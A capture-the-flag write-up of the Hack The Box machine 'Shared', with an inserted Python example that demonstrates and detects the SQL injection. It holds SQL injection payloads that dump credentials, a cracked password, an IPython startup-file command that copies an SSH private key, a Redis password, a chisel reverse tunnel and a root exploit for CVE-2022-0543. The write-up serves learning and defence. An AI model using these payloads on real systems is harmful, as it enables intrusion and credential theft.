Shared - HTB - Key Points
October 25, 2022
Target's IP: 10.10.11.172
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Root page / redirects to: http://shared.htb
Subdomain enumeration returns checkout as a valid subdomain, so we also add checkout.shared.htb to the hosts file.
The e-commerce software is PrestaShop, which appears to be affected by a public exploit, https://www.exploit-db.com/exploits/45964, but I was not able to make it work.
The custom_cart cookie is injectable: the size of the response from the checkout subdomain changes when the injected query succeeds, so we can use it to build a SQL injection and retrieve content.
Using ORDER BY to enumerate the number of columns, we find that the query selects 3 columns, so a UNION must supply 3 as well.
{"SS5UMYLB' AND 1=0 UNION SELECT 1,2,3-- -'":"1"}
allows us to reflect our content on the webpage; from here we start enumerating the DB.
{"SS5UMYLB' AND 1=0 UNION SELECT 1,group_concat(schema_name),3 from information_schema.schemata-- -'":"1"}
returns the available schema names, which are information_schema and checkout.
{"SS5UMYLB' AND 1=0 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema='checkout'-- -'":"1"}
returns the available tables, which are user and product.
{"SS5UMYLB' AND 1=0 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name='user'-- -'":"1"}
returns the available columns, which are id, username and password.
{"SS5UMYLB' AND 1=0 UNION SELECT 1,group_concat(username, password),3 from user-- -'":"1"}
with which we retrieve the username and password from the DB:
james_mason:fc895d4eddc2fc12f995e18c865cf273
CrackStation tells us this is the MD5 of Soleil101; we can use this username and password to log in over SSH.
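As an added example, not code from the writeup or from PrestaShop, here is a small Python/sqlite3 recreation of the cart lookup described above: the string-built query reflects the writeup's UNION payload, the parameterized version does not, and a key-format check flags such cookies before they reach the database. The table and column names follow the page; the rows, the expected product-code format and the query shape are assumptions.

```python
import json
import re
import sqlite3

# Constructed stand-in for the checkout database: the table and column names
# follow the writeup, the rows are invented for this example.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE product (code TEXT PRIMARY KEY, price REAL, qty INTEGER);
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO product VALUES ('SS5UMYLB', 9.99, 10);
        INSERT INTO user VALUES (1, 'example_user', 'example_hash');
    """)
    return conn

# Assumed vulnerable pattern (not PrestaShop's own code): every key of the
# custom_cart JSON is spliced into the SQL text, so a key can close the quote
# and append a UNION, which is exactly what the writeup's cookie payloads do.
def lookup_vulnerable(conn, custom_cart):
    rows = []
    for code in json.loads(custom_cart):
        sql = f"SELECT code, price, qty FROM product WHERE code='{code}'"
        rows += conn.execute(sql).fetchall()
    return rows

# Hardened version: the cookie value is only ever bound as a query parameter,
# so quotes and SQL keywords inside it are just characters of a product code.
def lookup_hardened(conn, custom_cart):
    rows = []
    for code in json.loads(custom_cart):
        sql = "SELECT code, price, qty FROM product WHERE code=?"
        rows += conn.execute(sql, (code,)).fetchall()
    return rows

# Detection / input-validation check: product codes are assumed to be 8 upper-case
# alphanumerics, so any other key (quotes, comment markers, UNION) is reported.
CODE_RE = re.compile(r"^[A-Z0-9]{8}$")
def suspicious_cart_keys(custom_cart):
    try:
        cart = json.loads(custom_cart)
    except ValueError:
        return [custom_cart]
    return [key for key in cart if not CODE_RE.match(key)]

LEGIT = '{"SS5UMYLB":"1"}'
# The column-reflection payload quoted in the writeup, used as the cookie value.
INJECTED = '{"SS5UMYLB\' AND 1=0 UNION SELECT 1,2,3-- -\'":"1"}'
```

With the injected cookie the vulnerable lookup returns the attacker-chosen row (1, 2, 3) while the hardened lookup returns nothing, and the key check reports the cookie before any query runs.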
Using pspy64 we notice a command running frequently:
/bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython
We have access to the /opt/scripts_review folder as members of the developer group.
Following a public blog post on this IPython startup-file issue, we can build the following command to exploit ipython and read dan_smith's SSH private key:
mkdir -m 777 /opt/scripts_review/profile_default; mkdir -m 777 /opt/scripts_review/profile_default/startup; echo "import os; os.system('cat /home/dan_smith/.ssh/id_rsa > /tmp/key')" > /opt/scripts_review/profile_default/startup/script.py
dan_smith@shared:~$ cat user.txt
94...dc
This user is part of a new group, sysadmin.
Checking permissions for this new group, it turns out we can access an interesting file related to the redis DB running on the box:
dan_smith@shared:~$ find / -group sysadmin -type f 2>/dev/null
/usr/local/bin/redis_connector_dev
If we try to run the binary on our local machine, it reports connection refused on port 6379.
Starting a netcat listener on that port and re-running the binary, this is what we see:
listening on [any] 6379 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 36892
*2
$4
auth
$16
F2WHqJUz2WEz=Gqq
This is the RESP encoding of an AUTH command with a single argument: the last value looks like the password used for authentication, but there is no username.
According to the Redis documentation, when AUTH is used without a username the implicit username is "default".
We can try the pair default:F2WHqJUz2WEz=Gqq to authenticate to the DB, and it turns out these are valid credentials:
dan_smith@shared:/usr/local/bin$ redis-cli -h localhost
localhost:6379> auth default F2WHqJUz2WEz=Gqq
OK
According to HackTricks, you can run commands through Lua, but you need a bypass, https://github.com/aodsec/CVE-2022-0543, which is linked from that page.
You cannot run it on the target because some required modules are not installed, so we use a reverse port forward with chisel. On the attacking machine:
chisel server -p 9001 --reverse &
and on the target:
chisel client attacking_ip:9001 R:6379:127.0.0.1:6379
Run the CVE PoC and get RCE as root:
Please input redis ip:
>>127.0.0.1
Please input redis port:
>>6379
input exec cmd:(q->exit)
>>id
b'uid=0(root) gid=0(root) groups=0(root)\n'
input exec cmd:(q->exit)
>>cat /root/root.txt
b'9d...a3\n'
input exec cmd:(q->exit)
>>